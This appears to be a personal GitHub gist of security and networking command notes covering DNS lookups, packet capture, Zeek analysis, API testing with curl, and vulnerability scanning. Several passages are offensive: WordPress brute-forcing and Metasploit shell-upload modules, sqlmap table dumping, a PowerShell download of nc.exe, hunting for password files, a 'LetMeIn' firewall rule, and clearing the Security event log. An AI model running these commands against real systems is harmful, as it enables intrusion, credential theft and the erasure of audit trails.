nslookup redhat.com ns1.redhat.com
#view all the available DNS records using -query=any option.
nslookup -type=any google.com
nslookup 217.168.240.132
-------------------------------------------------------------------------------------------------------------------
#ChatGPT
Zone Transfer
Using nslookup Command
nslookup
server domain.com
ls -d domain.com
"server domain.com" command can be useful in situations where the default DNS server used by the nslookup command is not able to resolve the DNS query. For example, if the default DNS server is experiencing issues or is not configured to handle queries for a specific domain, the "server domain.com" command can be used to specify a different DNS server to use for the lookup. This can help security engineers to troubleshoot DNS-related issues and identify potential misconfigurations or security vulnerabilities.
"ls -d domain.com" command is commonly used by security engineers during reconnaissance and vulnerability assessment activities. By performing a DNS zone transfer request, security engineers can obtain a complete list of the DNS records for a domain, including any subdomains and associated IP addresses. This information can be used to identify potential attack vectors, such as misconfigured DNS records or outdated software versions. Additionally, security engineers can use the information obtained from a zone transfer request to perform further reconnaissance or targeted attacks against the domain.
-------------------------------------------------------------------------------------------------------------------
#ChatGPT
Here are some popular online SSL checker tools:
SSL Labs (https://www.ssllabs.com/ssltest/)
Qualys SSL Labs (https://www.ssllabs.com/ssltest/index.html)
DigiCert SSL Installation Diagnostics Tool (https://www.digicert.com/help/)
GlobalSign SSL Configuration Checker (https://globalsign.ssllabs.com/)
GeoCerts SSL Checker (https://www.geocerts.com/ssl_checker)
SSL Shopper SSL Checker (https://www.sslshopper.com/ssl-checker.html)
Sectigo SSL Checker (https://sectigo.com/ssl-checker)
RapidSSL Online SSL Checker (https://www.rapidssl.com/ssl-checker/)
GoDaddy SSL Checker (https://ssl-ccp.godaddy.com/)
Comodo SSL Analyzer (https://sslanalyzer.comodoca.com/)
-------------------------------------------------------------------------------------------------------------------
#List of HTTP status codes
https://en.wikipedia.org/wiki/List_of_HTTP_status_codes
-------------------------------------------------------------------------------------------------------------------
look up IP geolocation from the command line
$ curl ipinfo.io/23.66.166.151
$ sudo yum install GeoIP GeoIP-data
$ geoiplookup 8.8.4.4
set this up as a cron:
$ /usr/bin/geoipupdate
============================================================================
Scapy to perform layer 2 discovery
# scapy
>>> ARP().display()
>>> arp_request1 = ARP()
>>> arp_request1.pdst = "192.168.2.11"
>>> arp_request1.display()
>>> sr1(arp_request1)
>>> sr1(ARP(pdst="192.168.2.11"))
============================================================================
$ sec -conf=root_login_attempts.conf -input=-
# root_login_attempts.conf sec rule
type=Single
ptype=RegExp
pattern=Failed password for root
desc=Matched: $0
action=logonly
============================================================================
Listen to the interface and print a single packet
netsniff-ng --num 1 --in eth1
Write traffic coming in on eth0 to dump.pcap and don't print any output.
netsniff-ng --in eth0 --out dump.pcap --silent --bind-cpu 0
write a new pcap to the /mypcaps directory each day
netsniff-ng --in eth0 --out /mypcaps --interval 24hrs
send packets from eth0 to eth1
netsniff-ng --in eth0 --out eth1 --mmap --silent --prio-high
replay a network trace to an IDS listening on eth0 or attached to a hub
netsniff-ng --in dump.pcap --mmap --out eth0 -k1000 --silent --bind-cpu 1
Apply a BPF filter, print matched packets in ASCII, accept jumbo frames, and increase verbosity:
netsniff-ng --in any --filter http.bpf --jumbo-support --ascii -V
Write new file every 10 seconds to the current directory and print packet statistics for every interval by specifying verbose mode
netsniff-ng --in any -s --out . --interval 10sec -V
Write a low-level BPF filter with bpfc and then pass to netsniff-ng
$ bpfc -i sample_bpf.txt > ethernet.bpfc
$ netsniff-ng --in eth0 --out ethernet.pcap --filter ethernet.bpfc
Use tcpdump to dump BPF filter opcodes to file and pass to netsniff-ng
tcpdump -dd 'ip src 192.168.1.1 and tcp and port (53 or 80 or 443)' > myfilter.bpf
netsniff-ng --in eth0 --filter myfilter.bpf --ascii
Create a trafgen configuration file from a pcap and generate it out eth1 in random order.
netsniff-ng --in ns-ng.pcap --out ns-ng.cfg -s
trafgen --in ns-ng.cfg --out eth1 --rand
============================================================================
# Fping: Fping is a command-line tool that can be used to ping multiple hosts at once.
#It can be used to quickly determine which hosts are up and running, which can be useful before running a port scan.
fping 50.116.66.139 173.194.35.35 98.139.183.24 #fping multiple IP address at once and it will display status as alive or unreachable
fping -s -g 192.168.0.1 192.168.0.9 #fping a specified range of IP addresses
fping -g -r 1 192.168.0.0/24 #ping complete network and repeat once (-r 1)
fping < fping.txt #create a file called fping.txt having IP address (173.194.35.35 and 98.139.183.24) to fping
============================================================================
#Wireshark installation directory:
Windows 32-bit:
C:\> cd /d "C:\Program Files (x86)\Wireshark\"
Windows 64-bit:
C:\> cd /d "C:\Program Files\Wireshark\"
C:\Program...\Wireshark> capinfos.exe -A C:\path_to\Name_of_Large_Traffic_Capture_File.pcap
#Split the large traffic capture file into desired number of smaller files
C:\Program...\Wireshark> editcap.exe -F pcapng -c <Packets_per_File> C:\path_to\Name_of_Large_Traffic_Capture_File.pcap C:\path_to\Name_of_Smaller_Traffic_Capture_File.pcap
C:\Program Files\Wireshark> editcap.exe -F pcapng -c 9545 c:\capture\fw_mon.pcap c:\capture\fw_mon_split.pcap
editcap -d Duplicates.pcap NoDuplicates.pcap #remove duplicate packages
mergecap 1.pcap 2.pcap #merge two pcap files
============================================================================
capinfos mycapture.pcap #generate a long form report
capinfos -T mycapture.pcap #generate a TAB delimited table form report
capinfos -T -t -E -c *.pcap
capinfos -TtEs *.pcap
capinfos -T -m -Q mycapture.pcap #generate a CSV style table form report
capinfos -TmQ mycapture.pcap
capinfos -TmQ *.pcap >mycaptures.csv
============================================================================
# use the SQL, XSS and XXE modules when scanning the target.
wapiti -u http://testphp.vulnweb.com -m sql,xss,xxe
# the xss module will apply to requests submitted by the GET method
wapiti -u http://testphp.vulnweb.com -m “xss: get, blindsql: post, xxe: post”
#The wapiti-getcookie tool can be used to use authentication
# use it to generate a cookie that Wapiti will use when scanning
# At the output,file in JSON format
wapiti-getcookie -u http://demo.testfire.net/login.jsp -c cookie.json
# Another option is to add all the required information via the -d parameter
wapiti-getcookie - http://demo.testfire.net/login.jsp -c cookie.json -d "username=admin&password=admin&enter=submit"
# -m – connect all modules – not recommended, because will affect testing time and report size
# -c – use the cookie file generated by wapiti-getcookie
# -scope – selection of a target for an attack. Selecting the folder option will scan and attack every URL starting from the base one. The base URL must have a forward slash (no filename)
# -flush-session – allows you to re-scan, which will not take into account previous results
# -A – own User-Agent
# -p – proxy server address
wapiti --level 1 -u http://demo.testfire.net -f html -o /tmp/vulns.html -m all --color -с cookie.json --scope folder --flush-session -A 'Wapiti Scans' -p http://myproxy:3128
# -n: Define a limit of urls to read with the same pattern (prevent endless loops), here limit to 10.
wapiti http://demo.testfire.net -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
wapiti https://authlab.digi.ninja -u -n 5 -b domain -v 2 -o /tmp/outfile.html
# scan only for sql and blindsql attacks
wapiti https://authlab.digi.ninja -u -n 5 -b domain -m "-all,sql,blindsql" -v 2 -o /tmp/outfile.html
============================================================================
#list packages in meta packages ,https://www.kali.org/tools/kali-meta/
apt-get install -y kali-tools-database
apt depends kali-tools-database
apt show kali-tools-top10
============================================================================
right clicking on the web page,selecting Inspect on Google Chrome
More Tools- Developer Tools on Google Chrome
right clicking on the web page,selecting Inspect Element on Mozilla Firefox
More Tools- Web Developer Tools on Google Chrome
More Tools- Web Developer Tools on Edge/IE
============================================================================
#How to test a REST api
#HEAD requests
#check if a resource is serviceable, what kind of headers it provides
#and other useful meta-information written in response headers, without having to transport the entire content
curl -I https://www.codever.land/api/public/bookmarks
#-i, --include - include the HTTP response headers in the output
-X, --request - specify a custom request method (GET, PUT, DELETE)
curl -i -X HEAD https://www.codever.land/api/public/bookmarks
#GET requests,curl with no parameters on a URL
curl https://www.codever.land/api/version
curl -v http://www.example.com/ #verbose mode on
curl -v http://localhost:8082/spring-rest/foos/9
curl -o out.json http://www.example.com/index.html #provide the output option to save to a file
curl -X GET "https://www.codever.land/api/version" -H "accept: application/json"
curl https://www.codever.land/api/version | jq .
curl -s https://www.codever.land/api/version | jq .
#Curl request with multiple headers
curl -v -H "Accept:application/json" -H "Accept-encoding:gzip" https://www.codever.land/api/version
#CRUD operation
curl \
-d 'client_id=bookmarks' \
-d 'username=mock' \
-d "password=mock" \
-d 'grant_type=password' \
'http://localhost:8480/auth/realms/bookmarks/protocol/openid-connect/token' \
| jq .
#extract just the access_token
curl -s \
-d 'client_id=bookmarks' \
-d 'username=ama' \
-d "password=ama" \
-d 'grant_type=password' \
'http://localhost:8480/auth/realms/bookmarks/protocol/openid-connect/token' \
| jq -r '.access_token'
curl -s -X GET "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741" \
-H "accept: application/json" \
-H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCIgOi..." | jq .
#POST requests
curl -i -X POST "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks" \
-H "accept: */*" -H "Authorization: Bearer eyJhbGciOiJ...." \
-H "Content-Type: application/json" -d "{\"name\":\"How to test a REST api from command line with curl – CodepediaOrg\",\"location\":\"https://www.codepedia.org/ama/how-to-test-a-rest-api-from-command-line-with-curl/\",\"language\":\"en\",\"tags\":[\"rest\",\"curl\",\"api\",\"testing\"],\"publishedOn\":\"2020-03-05\",\"sourceCodeURL\":\"https://github.com/codeverland/codever\",\"description\":\" In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP Requests against a REST API. For the purpose of this blog post I will be using the REST api that supports [www.codever.land](https://www.codever.land)\",\"descriptionHtml\":\"<p>In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP Requests against a REST API. For the purpose of this blog post I will be using the REST api that supports <a href=\\\"https://www.codever.land\\\">www.codever.land</a></p>\",\"userId\":\"4c617f2b-2bad-498b-a9c6-4e9a8c303798\",\"public\":true,\"lastAccessedAt\":\"2020-03-06T20:14:28.101Z\",\"likeCount\":0}"
curl -d 'id=9&name=baeldung' http://localhost:8082/spring-rest/foos/new #send data to a receiving service
#pass a file containing the request body to the data option
curl -d @request.json -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
# if service expects JSON content-type, use the -H option
curl -d @request.json -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
#Windows command prompt has no support for single quotes like the Unix-like shells
curl -d "{\"id\":9,\"name\":\"baeldung\"}" -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
#PUT requests
curl -s -X PUT "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741" \
-H "accept: application/json" -H "Authorization: Bearer eyJhbGciOiJSUzI1NiI..." \
-H "Content-Type: application/json" -d "{\"name\":\"How to test a REST api from command line with curl – CodepediaOrg\",\"location\":\"https://www.codepedia.org/ama/how-to-test-a-rest-api-from-command-line-with-curl/\",\"tags\":[\"rest\",\"curl\",\"api\",\"testing\"],\"publishedOn\":\"2020-03-05T00:00:00.000Z\",\"sourceCodeURL\":\"https://github.com/codeverland/codever\",\"description\":\"In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP requests against a REST API. For the purpose of this blog post I will be using the REST api that supports [www.codever.land](https://www.codever.land)\",\"public\":true,\"readLater\":false,\"language\":\"en\",\"youtubeVideoId\":null,\"stackoverflowQuestionId\":null,\"descriptionHtml\":\"<p>In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP requests against a REST API. For the purpose of this blog post I will be using the REST api that supports <a href=\\\"https://www.codever.land\\\">www.codever.land</a></p>\",\"updatedAt\":\"2020-03-06T20:42:53.706Z\",\"lastAccessedAt\":\"2020-03-06T20:42:53.706Z\",\"userId\":\"4c617f2b-2bad-498b-a9c6-4e9a8c303798\",\"_id\":\"5e62b18b59770b5487a4c741\"}" | jq .
curl -d @request.json -H 'Content-Type: application/json'
-X PUT http://localhost:8082/spring-rest/foos/9
#Delete requests
curl -i -X DELETE "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741"
-H "accept: */*" -H "Authorization: Bearer eyJhbGciOiJS...."
curl -X DELETE http://localhost:8082/spring-rest/foos/9
#Custom Headers,replace the default headers or add headers
curl -H "Host: com.baeldung" http://example.com/ #change the Host header
curl -H "User-Agent:" http://example.com/ #switch off the User-Agent header,put in an empty value
#The most common scenario while testing is changing the Content-Type and Accept header
#prefix each header with the -H option
curl -d @request.json -H "Content-Type: application/json"
-H "Accept: application/json" http://localhost:8082/spring-rest/foos/new
#Authentication
curl --user baeldung:secretPassword http://example.com/ #basic authentication,add the username and password
curl -H "Authorization: Bearer b1094abc0-54a4-3eab-7213-877142c33fh3" http://example.com/ #use OAuth2 for authentication
============================================================================
bro -C -r [network capture file] local #analysis network capture
bro -C -r [sample.pcap] local “Site::local_nets += { 10.0.0.0/8 }
cat conn.log | bro-cut uid id.orig_h id.resp_h duration | sort -nr -k4 | head -n 5
#infected by Emotet with Trickbot malware
cat ssl.log | bro-cut uid id.orig_h id.orig_p id.resp_h id.resp_p cert_chain_fuids issuer
cat ssl.log | bro-cut ts id.orig_h id.orig_p id.resp_h id.resp_p server_name issuer
#One server X509 certificate sha1 signature is listed on SSL abuse database
cat intel.log | bro-cut uid id.orig_h id.orig_p id.resp_h id.resp_p seen.indicator fuid sources
#the SSL abuse database export file
cat files.log | bro-cut source sha1 | grep SSL | grep -v \- | sort -u | awk ‘{printf $2”\n”}’ | \
xargs -I {} grep {} sslblacklist.csv --color
zeek -C -r tm1t.pcap
cat dns.log | zeek-cut
cat dns.log | zeek-cut id.orig_h query answers
============================================================================
#kali vega subgraph fix, sudo bash kali_vega.sh
$ cat kali_vega.sh
#!/bin/sh
cat <<EOT | sudo tee /etc/apt/sources.list.d/stretch.list
deb http://deb.debian.org/debian/ stretch main contrib non-free
deb-src http://deb.debian.org/debian/ stretch main contrib non-free
deb http://security.debian.org/ stretch/updates main contrib non-free
deb-src http://security.debian.org/ stretch/updates main contrib non-free
EOT
sudo apt-get update -qy && sudo apt-get install libwebkitgtk-1.0 -qy
sudo apt-get install openjdk-8-jdk-headless -qy
sudo update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java #non-interactive
java -version
whoami #vagrant user
wget https://support.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip
unzip VegaBuild-linux.gtk.x86_64.zip # vagrant user home directory
chown -R vagrant:vagrant vega
============================================================================
#TCP Wrappers and Connection Banners
#create a banner file. It can be anywhere on the system, but it must have same name as the daemon
#The %c token supplies a variety of client information, such as the user name and host name,
#or the user name and IP address to make the connection even more intimidating
$cat /etc/banners/vsftpd
220-Hello, %c
220-All activity on ftp.example.com is logged.
220-Inappropriate use will result in your access privileges being removed.
#For this banner to be displayed to incoming connections, add the following line to the
$cat /etc/hosts.allow
vsftpd : ALL : banners /etc/banners/
============================================================================
#TCP Wrappers and Attack Warnings
# assume that a cracker from the 206.182.68.0/24 network has been detected attempting to attack the server.
#Place the following line in the /etc/hosts.deny file to deny any connection attempts from that network, and to log the attempts to a special file
#TCP Wrappers can be used to warn the administrator of subsequent attacks from that host or network using the spawn directive.
$cat /etc/hosts.deny
ALL : 206.182.68.0 : spawn /bin/echo `date` %c %d >> /var/log/intruder_alert
#assume that anyone attempting to connect to port 23 (the Telnet port) on an FTP server is a cracker
#place an emerg flag in the log files instead of the default flag, info, and deny the connection.
$cat /etc/hosts.deny
in.telnetd : ALL : severity emerg
============================================================================
the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target
A way to specify "any IPv4 address at all". It is used in this way when configuring servers
A way to route a request to a nonexistent target instead of the original target. Often used for adblocking purposes.
0.0.0.0/0 all IPv4 addresses
::/0 all IPv6 addresses.
============================================================================
#SQL Injections
sqlmap -r filename.txt
sqlmap -u “http://…..?id=1″ –cookie=”cookie”
sqlmap -u “http://……?id=1″ –cookie=”cookie” -D db_name -T table_name –dump
sqlmap -u “http://…..?id=1″ –cookie=”cookie” -D db_name -T table_name –columns
sqlmap -u “http://…..?id=1″ –cookie=” ” -D db_name –tables
============================================================================
TheFatRat - malicious Office document
Armitage - access to a remote system
TMAC/SMAC- Spoof a MAC address
Cain & Abel - Man-in-the-Middle (MITM) attack
arpspoof - ARP poisoning
Yersinia - DHCP starvation attack
macof - MAC flooding
OpenStego - Data Hiding,Watermarking (beta)
L0phtCrack - Windows tools for password cracking/auditing
Rainbow Crack - Rainbow table cracking
Veracrypt - Disc encryption utility.
vulnerability analysis
OpenVAS
NessusGFI LanGuard
CGI Scanner Nikto
============================================================================
#word press vulnerability scan
#ChatGPT
#The version of WordPress can be found in the source code of the website.
#Open the website in a web browser and right-click anywhere on the page and select "View page source"
#Search for the string "generator" and you should see a line of code similar to this:
# <meta name="generator" content="WordPress x.x.x">
wpscan --url https://example.com
#Add the flag -p 80 to the command to scan only the ports that HTTP traffic uses, port 80.
#Add the flag -sV to the command to probe open ports to determine what service is running on them
#Add the flag --script=http-wordpress-enum to the command to run the specific script to check if wordpress is running on the server.
nmap -p 80 -sV --script=http-wordpress-enum example.com
#https://nmap.org/nsedoc/scripts/http-wordpress-enum.html
nmap -p 80 -sV --script=http-wordpress-enum --script-args check-latest=true,search-limit=10 example.com
subfinder -d example.com > wordpress_subfinder_urls.txt #dns enumeration, subdomains in example.com
#wpscan.sh https://gist.github.com/githubfoam/a727ae9ae07f7c73da1020c0c7c613cc
wpscan.sh > wpscan_subfinder.out # scan wordpress websites in scanned subdomains,
#Find out what websites are built With
https://builtwith.com
wpscan --url http://192.168.1.105/wordpress/ #Scanning the WordPress version of the target’s website
#Scan Aborted: The URL supplied redirects to,ignore the redirection and scan the target
wpscan --url http://192.168.1.105 --ignore-main-redirect
wpscan --url http://192.168.1.105/wordpress/ -e ap #Enumerating WordPress Plugins
wpscan --url http://192.168.1.105/wordpresws/ -e at #Enumerating WordPress Themes
wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u #Enumerate ALL with a single command
wpscan –url http://192.168.1.105/wordpress/ -e u #Enumerating WordPress Usernames
#scan a WordPress web-application running over a proxy server
#use the proxy port in order to scan the web-application
wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128
#Scanning with an HTTP Authentication enabled
wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123
#With the help of usernames enumerated earlier
#create a word list of all the users
#rockyou.txt password file which comes with kali standard installation and contains 14341564 unique passwords
wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt
#get to the Metasploit console and then run WordPress module
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100
msf auxiliary(wordpress_login_enum) > set targeturi /wordpress
msf auxiliary(wordpress_login_enum) > set user_file user.txt
msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit
#Shell Upload using Metasploit
#This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin
#gives the meterpreter session of the webserver
$msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
#found a vulnerable plugin i.e. “slideshowgallery” which contains an authenticated file upload vulnerability
#the following module offers a reverse shell
use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105
msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress
msf exploit(wp_ slideshowgallery _upload) > set username admin
msf exploit(wp_ slideshowgallery _upload) > set password jessica
msf exploit(wp_ slideshowgallery _upload) > exploit
============================================================================
#subdomain enumeration websites
https://dnsdumpster.com/
Google Dorks
site:*.domain.com -www
site:..domain.com -www
site:*.domain.com ext:pdf
site:*.domain.com ext:php
amass enum -passive -dir /tmp/amass_output/ -d example.com -o dir/example.com
============================================================================
#powershell
PS C:\> 1..255 | % {echo "10.10.10.$_";ping -n 1 -w 100 10.10.10.$_ | Select-String ttl} #ping sweep
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null #port scan
PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe") #Fetch a file via HTTP (wget in PowerShell)
PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt #Find all files with a par ticular name
PS C:\> Get-HotFix #Get a listing of all installed Microsoft Hotfixes
#Navigate the Windows registry
PS C:\> cd HKLM:\
PS HKLM:\> ls
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run #List programs set to star t automatically in the registr y
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("PSFTW!")) #Conver t string from ascii to Base64
#List and modify the Windows firewall rules
PS C:\> Get-NetFirewallRule –all
PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -
RemoteAddress 10.10.10.25
============================================================================
# information gathering, ChatGPT
Get-NetAdapter: displays a list of network adapters on a system, along with their configuration information.
Get-NetIPAddress: displays a list of IP addresses assigned to a system, along with their configuration information.
Get-NetRoute: displays a list of routing table entries on a system, which can help to identify the network topology.
Get-NetTCPConnection: displays a list of all TCP connections on a system, which can help to identify active connections and the remote systems they are connected to.
Get-NetUDPEndpoint: displays a list of all UDP endpoints on a system, which can help to identify active connections and the remote systems they are connected to.
Get-Process: displays a list of all running processes on a system, along with their resource usage.
Get-Service: displays a list of all running services on a system, along with their configuration information.
Get-EventLog: displays the contents of an event log, which can provide insight into system events and errors.
Get-WmiObject: allows you to retrieve information from the Windows Management Instrumentation (WMI) database, which contains a wealth of information about system configuration and performance.
Get-Hotfix: displays a list of installed hotfixes and updates on a system.
============================================================================
#In order to find out what user stopped the Windows Event Log, you can use the following PowerShell commands, ChatGPT
PS HKLM:\> Stop-Service -Name "eventlog" -Force
PS HKLM:\> Start-Service -Name "eventlog"
PS HKLM:\> Get-WinEvent -FilterHashtable @{LogName='Security'; ID=1100} -MaxEvents 50
ProviderName: Microsoft-Windows-Eventlog
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
2/18/2023 2:35:13 AM 1100 Information The event logging service has shut down.
2/18/2023 1:41:43 AM 1100 Information The event logging service has shut down.
2/15/2023 9:59:07 AM 1100 Information The event logging service has shut down.
2/10/2023 8:04:13 AM 1100 Information The event logging service has shut down.
2/9/2023 11:43:27 PM 1100 Information The event logging service has shut down.
#Clear the log events
PS HKLM:\> wevtutil cl Security
PS HKLM:\> Get-WinEvent -FilterHashtable @{LogName='Security'; ID=1102} -MaxEvents 50 | ForEach-Object { $_.Properties }
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
nmap -sV --script=http-git www.example.com
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
Check the domain's HTTP/HTTPS ports: Git service is typically hosted on port 9418 or 22.
So, you can use a tool like nmap to scan the domain's open ports and see if any of these ports are open.
For example, you can run the following command to scan the domain's open ports:
nmap <domain_name>
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
Check for the presence of a .git directory: Git service creates a .git directory in the root of the project.
You can use a tool like wget to download the web page and see if there is a .git directory.
For example, you can run the following command to check for the .git directory:
wget -r -np -A .git http://<domain_name>/
If the .git directory is present, it means that the domain is hosting a Git service.
Check for the presence of Git-related files: Git service creates some specific files like HEAD, config, index, etc.
in the .git directory. You can use a tool like curl to make an HTTP request to the domain and check for these files.
wget --spider -r -l 1 --no-parent <domain>/.git/config
Replace <domain> with the domain name you want to scan. The --spider option tells wget to only check if the file exists,
without actually downloading it. The -r option tells wget to recursively follow links on the domain,
while the -l 1 option limits the recursion depth to one level.
The --no-parent option tells wget not to follow links to parent directories.
Analyze the results: If a Git repository is present on the domain, wget will return a message indicating that
the .git/config file was found. If the message indicates that the file was not found or access was denied,
it's likely that the domain is not hosting a Git repository over HTTP.
It's important to note that this method only detects Git repositories over HTTP and does not work
for repositories using other protocols, such as SSH
Additionally, some Git services may be configured to block access to the .git/config file, so this method may not always be reliable
============================================================================
#detect if a domain is hosting a Git service, ChatGPT
For example, you can run the following command to check for Git-related files:
curl -i http://<domain_name>/.git/HEAD
If the response code is 200 OK and the response body contains the Git commit hash,
it means that the domain is hosting a Git service.
If the response code is not 200, it may indicate that the domain is not hosting a Git service or that the .git/config file is
not accessible for other reasons. In this case, you can try modifying the command to check for other common Git
files like .git/HEAD or .git/refs/heads/master.
curl -I <domain-name>/.git/config
curl -I <domain-name>/.git/HEAD
curl -I <domain-name>/.git/refs/heads/master
============================================================================
export GOVERSION="1.19"
wget https://golang.org/dl/go$GOVERSION.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go$GOVERSION.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
go version
go env
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/v2/cmd/nuclei/
sudo env "PATH=$PATH" sh -c "go build ."
sudo mv nuclei /usr/local/bin/
nuclei -h
echo "Defaults env_keep += "PATH"" |sudo tee -a /etc/sudoers
============================================================================
#nuclei with docker
docker pull projectdiscovery/nuclei:latest
docker run projectdiscovery/nuclei:latest --version
docker run projectdiscovery/nuclei:latest -u <target_url>
#Clone Nuclei Templates Repository
git clone https://github.com/projectdiscovery/nuclei-templates.git
#update the templates
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei -update-templates
#scans
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u <TARGET_URL> -t /nuclei-templates/<TEMPLATE_NAME>.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u https://example.com -t /nuclei-templates/cves/exposed-debug-endpoints.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u <TARGET_URL> -t /nuclei-templates/ssl/deprecated-tls.yaml
docker run -it -v /path/to/nuclei-templates:/nuclei-templates projectdiscovery/nuclei \
-u https://example.com -t /nuclei-templates/ssl/deprecated-tls.yaml
===========================================================================
#clamav on Ubuntu 23.04
#https://docs.clamav.net/manual/Installing/Docker.html
clamav/clamav:<version>_base: A release with no signature databases.
Use this container only if you mount a volume in your container under /var/lib/clamav to persist your signature database databases.
This method is the best option because it will reduce data costs for ClamAV and for the Docker registry,
but it does require advanced familiarity with Linux and Docker.
Using this image without mounting an existing database directory will cause FreshClam to download the entire database set each time
you start a new container.
The virus database in /var/lib/clamav is by default unique to each container and thus is normally not shared.
some use cases may want to efficiently share the database or at least persist it across short-lived ClamAV containers.
Volumes are completely managed by Docker and are the best choice for creating a persistent database volume
docker volume create clam_db
Then start one or more containers using this volume
The first container to use a new database volume will download the full database set
Subsequent containers will use the existing databases and may update them as needed:
docker run -it --rm \
--name "clam_container_01" \
--mount source=clam_db,target=/var/lib/clamav \
clamav/clamav:unstable_base
===========================================================================
#clamav on Ubuntu 23.04
#https://docs.clamav.net/manual/Installing/Docker.html
Recommended RAM for ClamAV (As of 2020/09/20):
Minimum: 3 GiB
Preferred: 4 GiB
If your container does not have enough RAM you can expect that the OS (or Docker) may kill your clamd process.
You can minimize clamd RAM usage by setting ConcurrentDatabaseReload no in clamd.conf.
The downside is that clamd will block any new scans until reload is complete.
clamav/clamav:<version>: A release preloaded with signature databases.
Use this if you will keep the image around so that you don't download the entire database set every time you start a new container
$ docker pull clamav/clamav:unstable
unstable: Pulling from clamav/clamav
7264a8db6415: Pull complete
a12491ef4ba9: Pull complete
9cfb3c31e879: Pull complete
f0e5e90185f2: Pull complete
b6f26fdfc81d: Pull complete
6b54ea1b1185: Pull complete
Digest: sha256:4d49196411c793d26c81d5a47a91785ef6312252370d717815db4a3893b64c08
Status: Downloaded newer image for clamav/clamav:unstable
docker.io/clamav/clamav:unstable
will always pull beforehand to ensure the most up-to-date container is being used
docker run --pull always
It's common to see -it instead of --interactive --tty
It's common to also publish (forward) the ClamAV TCP port to the local host
to use the TCP socket using --publish 3310:3310 in the docker run command
===========================================================================
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment